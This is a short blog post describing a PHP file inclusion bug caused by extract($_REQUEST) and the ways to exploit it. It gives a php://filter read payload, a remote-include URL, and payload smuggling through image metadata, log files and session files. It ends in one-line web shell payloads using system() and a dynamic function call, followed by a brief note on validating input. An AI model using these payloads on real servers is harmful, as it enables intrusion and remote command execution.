Local/Remote File Inclusion vulnerability

Local/Remote File Inclusion vulnerability

January 22, 2014 10:18 pm 0 comments

Found yet another bug,

include("config.php");
include($header);
extract($_REQUEST);
...
include($footer);

anything suspicious?

It is possible to pass ?footer=SOME_FILE and it will get passed to include() function.

There are many ways to exploit this:

You can read files with
?footer=php://filter/convert.base64-encode/resource=ANY_LOCAL_FILE

You can also read remote files if allow_url_include is set to true
?footer=http://example.tld/maliciouscode.txt

but the system I’ve found this bug in didn’t have allow_url_include and it didn’t have php filters because they were only introduced in PHP 5..but there is a way to exploit this anyway.

If you are able to upload the files to the server(usually you can upload them in forums), you can upload an image with malicious payload within EXIF headers or within PNG iDAT chunks, and include that file like so:
?footer=../../path/to/forum/images/your_cute_avatar.png

If that’s not possible, you can always send a GET request to the server and include /var/log/httpd/access_log, or send a mail and include /var/log/maillog.. But sometimes there are not enough permissions to read /var/log..you shouldn’t stop trying!

If the server provides PHPSESSID cookie, you can include
/var/lib/php/session/sess_PHPSESSID (sessions are saved in files by default)

Then find out what variables are stored there, and if you are as lucky as I am, you could change some variable like username to something like this: “<?php echo phpinfo(); ?>“, then re-login to update the session, and then by including the session file find out if disable_functions is enabled, after that there are 2 ways:

1) if system/exec functions are disabled you can change your username to:
“<?php $_GET[0]($_POST[1]); ?>”

2) otherwise change your username to:
 ”<?php system($_POST[1]); ?>”

Then you can do whatever you want with the system.

Lessons learned:
1) Never believe user input
2) Never believe user input
3) Never believe user input

 

P.S. or at least do use extract($_REQUEST,EXTR_SKIP) so variables don’t get overwritten

Leave a reply


%d bloggers like this: